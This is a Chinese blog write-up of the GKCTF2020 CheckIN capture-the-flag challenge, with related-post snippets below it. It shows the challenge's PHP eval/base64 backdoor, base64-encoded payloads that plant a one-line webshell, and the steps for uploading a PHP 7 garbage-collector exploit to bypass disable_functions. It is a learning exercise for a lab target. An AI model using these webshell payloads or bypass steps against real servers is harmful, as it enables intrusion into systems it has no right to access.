[GKCTF2020]CheckIN

最新推荐文章于 2021-06-23 23:40:26 发布
最新推荐文章于 2021-06-23 23:40:26 发布
阅读量354 收藏 1
点赞数
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45691294/article/details/108800077
版权

打开题目,直接得到源码

<title>Check_In</title>
<?php 
highlight_file(__FILE__);
class ClassName
{
        public $code = null;
        public $decode = null;
        function __construct()
        {
                $this->code = @$this->x()['Ginkgo'];
                $this->decode = @base64_decode( $this->code );
                @Eval($this->decode);
        }

        public function x()
        {
                return $_REQUEST;
        }
}
new ClassName();

源码较为简单,总结一下就是
eval(base64_decode($_REQUEST['Ginkgo']))
存在代码执行漏洞,却发现很多函数被ban了,可能是开启了disable_function,这里先尝试是否能执行phpinfo()
phpinfo(); base64加密之后cGhwaW5mbygpOw==
/?Ginkgo=cGhwaW5mbygpOw==
执行成功,查看一下disable_function中被ban的函数
在这里插入图片描述
所以,这里需要绕过disable_function,先传一句话木马连接上shell
一句话木马eval($_POST[‘A’]); 加密之后得ZXZhbCgkX1BPU1RbJ0EnXSk7
/?Ginkgo=ZXZhbCgkX1BPU1RbJ0EnXSk7
在这里插入图片描述
在根目录文件下发现flag文件和readflag文件,猜测执行readflag就能读取到flag,但是权限等问题无法读取和执行
这里就需要使用绕过disable_function的技巧,通过phpinfo得知,该php的版本为7.3,在该版本下,php7-gc-bypass漏洞利用PHP garbage collector程序中的堆溢出触发进而执行命令
影响范围是linux,php7.0-7.3,给出了exp
下载后进行修改,改为执行readflag
在这里插入图片描述
然后通过蚁剑进行上传这里发现tmp目录权限是1777,于是决定上传到这个目录
在这里插入图片描述上传成功
在这里插入图片描述
通过之前的一句话来执行文件包含,得到flag
在这里插入图片描述
在这里插入图片描述

沫忆末忆
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【学习笔记 22】 buu [GKCTF2020]CheckIN
weixin_43553654的博客
06-25 574
0x00 知识点 任意文件写入漏洞,部分过滤的绕过 0x01 解题过程 打开一看,代码审计 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $th
checkin
03-18
【标题】:“checkin”项目解析 【描述】:这个名为“checkin”的项目是一个针对“深层链接”教程而创建的“酒店基本入住”Web应用程序。它的主要目标是提供一个平台,用户可以在这个平台上模拟酒店的入住流程,...
GKCTF2020 checkin
qq_53755216的博客
06-23 331
写在前面 最近快期末考了 拼搏20天 我要上大二 每天晚上会找时间刷一下CTF 正片开始 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $thi
[GKCTF2020]CheckIN 详细解题思路及做法
EC_Carrot的博客
12-07 1902
前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! 题目 打开题目,看到class以为是反序列化,但实际并不是,这里直接用$_REQUEST传入了参数便可以利用了。 看到base64_decode,说明我们的代码需要加密一下,尝试着直接传入c3lzdGVtKCdscycpOw==(即为base64加密后的system('ls');) 发现并不能返回数据,是难道是不能这么利用吗? 接着我尝试了一下cGh
glados_checkin
03-25
glados定时签到
checkin-system
05-19
2.克隆gsshop-checkin $ git clone https://github.com/GSSHOPLabs/gsshop-checkin.git $ cd gsshop-checkin $ npm install 3.启动gsshop-checkin $ node ./bin/www 4.开始开发 http://localhost:3000 5.捕获...
checkin-ncku
05-21
checkin-nckuFeature打卡完截屏并寄到信箱每天随机打卡依据上班时间,在合法时间内进行随机下班打卡依据假期日,跳过打卡日期Install yarn installUsage填入所需的帐户资讯到credential.json cp credential-template...
checkin-alert
04-02
基础导轨 标准工作流程 设置项目: bin/setup 通过运行bin/server启动Web bin/server 。 导航到您的实时应用程序。 在工作时,请记住导航到/git并在工作时经常提交。
tongji_checkin
03-04
【同济大学健康打卡自动脚本--GitAction版】是一个基于Python编程语言的自动化工具,专为同济大学的学生或教职工设计,旨在简化每日的健康打卡流程。此脚本利用了GitAction,一个GitHub的动作(Actions)服务,使得...
daily_checkin.zip
01-07
【标题】"daily_checkin.zip" 是一个包含脚本的压缩包,用于自动完成天翼云的每日签到任务,并且据描述在2022年1月7日时已经经过了测试,证明是可用的。这个压缩包可能对那些需要定期在天翼云平台签到并领取额外存储...
hence-flight-checkin
05-06
link rel =" import " href =" bower_components/hence-flight-checkin/hence-flight-checkin.html " >发展所有开发都是利用/ src和/ test文件夹中的文件进行的。依存关系元素依赖关系通过NPM& 进行管理。 您...
southwest-checkin-3
03-14
西南签到3.X 自动检查乘客的西南航班。 第3版是v2的升级版本,以通过Heroku托管的最新...由非Rails人员针对Ruby 2.6.3,Rails 5.2.3更新获取签到源git clone https://github.com/davidkassa/southwest-checkin-3.gitcd
checkin:阿拉斯普兰斯
06-30
"checkin-master"这个压缩包文件名可能是项目源代码的主分支或者主目录,暗示着它包含了整个应用的源代码。在解压后,我们可能会找到以下常见的文件和文件夹结构: 1. `index.html`:主HTML文件,定义了网页的结构...
[GKCTF2020]CheckIN详解
D1stiny的博客
06-01 4356
打开之后是这样的,没有发现反序列化函数,但是发现有一个@eval,想到了一句话,这是用base64进行传参 首先传参phpinfo();看看,需要经过base64编码 http://e0cc90ac-d4bc-450c-a6a4-476298ce7c18.node3.buuoj.cn/?Ginkgo=cGhwaW5mbygpOw== 找到disable_functions,发现过滤了许多危险函数 我们上传一个一句话木马看看 eval($_POST[123]);,经过base64是ZXZhbCgkX1
[GKCTF2020]CheckIN bypass_php7_disable_functions
偷一个月亮
09-01 455
[GKCTF2020]CheckIN <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = ...
Buuctf [GKCTF2020]CheckIN
CyhDl666的博客
03-19 331
进入网站直接贴了源码 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = @$this->x()['Gin.
[GKCTF2020]CheckIN -wp
freerats的博客
06-06 1213
向Ginkgo传参,后面还有eval函数,先传个phpinfo(); 试试,要传base64编码后的。 发现没有问题,发现一大堆被禁的函数,php版本为7.3。 接下来看看能不能穿一句话上去 eval($_POST[‘ccc’]); ?Ginkgo=ZXZhbCgkX1BPU1RbJ2NjYyddKTs= 然后用蚁剑连接 可以看到flag和readflag; 权限不够无法打开flag,readflag打开也是一堆乱码。 这种情况一般就是通过执行readflag来获取flag。 接下来就要结合7.3版本,r
2021gkctf checkin
最新发布
02-29
2021gkctf checkin 是一个CTF(Capture The Flag)比赛,是由GKSEC团队举办的。CTF比赛是一种网络安全竞赛,旨在测试参赛者在网络安全领域的技能和知识。 在2021gkctf checkin中,参赛者需要完成一系列的网络安全挑战,包括密码学、逆向工程、漏洞利用等等。参赛者需要通过解决这些挑战来获取旗帜(flag),并提交给比赛组织者。 比赛的checkin阶段通常是指参赛者进行报名和注册的过程。具体的checkin流程可能因比赛组织者而异,一般需要填写个人信息、同意比赛规则等等。 如果你想了解更多关于2021gkctf checkin的信息,建议你访问GKSEC团队的官方网站或者参考他们的相关公告和规则。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值